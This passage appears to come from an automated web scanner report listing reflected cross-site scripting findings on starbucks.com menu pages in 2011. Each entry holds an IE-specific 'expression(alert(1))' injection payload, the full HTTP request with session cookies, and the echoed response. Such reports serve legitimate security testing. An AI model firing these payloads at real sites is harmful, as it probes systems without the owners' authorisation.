GET /menu/food/ice-cream/coffee-ice-cream?4981d"style%3d"x%3aexpression(alert(1))"713a0269255=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:05:17 GMT Connection: close Content-Length: 38702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream?4981d"style="x:expression(alert(1))"713a0269255=1"/> ...[SNIP]...
1.874. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9c8a"style="x:expression(alert(1))"a6fb88be708 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style%3d"x%3aexpression(alert(1))"a6fb88be708=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:05:21 GMT Connection: close Content-Length: 38920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream?f9c8a"style="x:expression(alert(1))"a6fb88be708=1"/> ...[SNIP]...
1.875. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/ice-cream/mocha-frappuccino-ice-cream
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 257c5"style%3d"x%3aexpression(alert(1))"1c951768a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 257c5"style="x:expression(alert(1))"1c951768a35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style%3d"x%3aexpression(alert(1))"1c951768a35=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:06:07 GMT Connection: close Content-Length: 38836
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream?257c5"style="x:expression(alert(1))"1c951768a35=1"/> ...[SNIP]...
1.876. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/ice-cream/peppermint-mocha-ice-cream
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e9f1"style="x:expression(alert(1))"4d62ee870d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style%3d"x%3aexpression(alert(1))"4d62ee870d0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:06:37 GMT Connection: close Content-Length: 38833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream?2e9f1"style="x:expression(alert(1))"4d62ee870d0=1"/> ...[SNIP]...
1.877. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0a4d"style="x:expression(alert(1))"9e96fe99df4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style%3d"x%3aexpression(alert(1))"9e96fe99df4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:06:25 GMT Connection: close Content-Length: 38968
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream?f0a4d"style="x:expression(alert(1))"9e96fe99df4=1"/> ...[SNIP]...
1.878. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d87ac"style="x:expression(alert(1))"de1edf0e094 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style%3d"x%3aexpression(alert(1))"de1edf0e094=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:06:34 GMT Connection: close Content-Length: 39107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style="x:expression(alert(1))"de1edf0e094=1"/> ...[SNIP]...
1.879. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3a1e"style="x:expression(alert(1))"4551818f1b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:07:31 GMT Connection: close Content-Length: 38897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style="x:expression(alert(1))"4551818f1b7=1"/> ...[SNIP]...
1.880. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/salads/farmers-market-salad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a321"style="x:expression(alert(1))"41fb35d7151 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/salads/farmers-market-salad?1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:00:03 GMT Connection: close Content-Length: 41349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/salads/farmers-market-salad?1a321"style="x:expression(alert(1))"41fb35d7151=1"/> ...[SNIP]...
1.881. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/salads/fruit-cup
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70519"style="x:expression(alert(1))"4a15c0eea7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/salads/fruit-cup?70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:00:51 GMT Connection: close Content-Length: 40422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/salads/fruit-cup?70519"style="x:expression(alert(1))"4a15c0eea7e=1"/> ...[SNIP]...
1.882. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/salads/garden-pesto-salad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 902fd"style="x:expression(alert(1))"a1481263ac9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/salads/garden-pesto-salad?902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:00:31 GMT Connection: close Content-Length: 38600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/salads/garden-pesto-salad?902fd"style="x:expression(alert(1))"a1481263ac9=1"/> ...[SNIP]...
1.883. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/food/salads/picnic-pasta-salad
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e882"style%3d"x%3aexpression(alert(1))"92587de2079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e882"style="x:expression(alert(1))"92587de2079 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/salads/picnic-pasta-salad?5e882"style%3d"x%3aexpression(alert(1))"92587de2079=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:00:44 GMT Connection: close Content-Length: 41357
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/salads/picnic-pasta-salad?5e882"style="x:expression(alert(1))"92587de2079=1"/> ...[SNIP]...
1.884. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21399"style="x:expression(alert(1))"64c8a4cbb38 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:02:36 GMT Connection: close Content-Length: 42767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style="x:expression(alert(1))"64c8a4cbb38=1"/> ...[SNIP]...
1.885. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92a9e"style="x:expression(alert(1))"5df87dc4572 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:01:41 GMT Connection: close Content-Length: 42082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style="x:expression(alert(1))"5df87dc4572=1"/> ...[SNIP]...
1.886. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95062"style%3d"x%3aexpression(alert(1))"9a2157818d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95062"style="x:expression(alert(1))"9a2157818d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style%3d"x%3aexpression(alert(1))"9a2157818d9=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:03:21 GMT Connection: close Content-Length: 42265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style="x:expression(alert(1))"9a2157818d9=1"/> ...[SNIP]...
1.887. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1782"style%3d"x%3aexpression(alert(1))"c12556678ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1782"style="x:expression(alert(1))"c12556678ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style%3d"x%3aexpression(alert(1))"c12556678ba=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 04:03:15 GMT Connection: close Content-Length: 42828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style="x:expression(alert(1))"c12556678ba=1"/> ...[SNIP]...
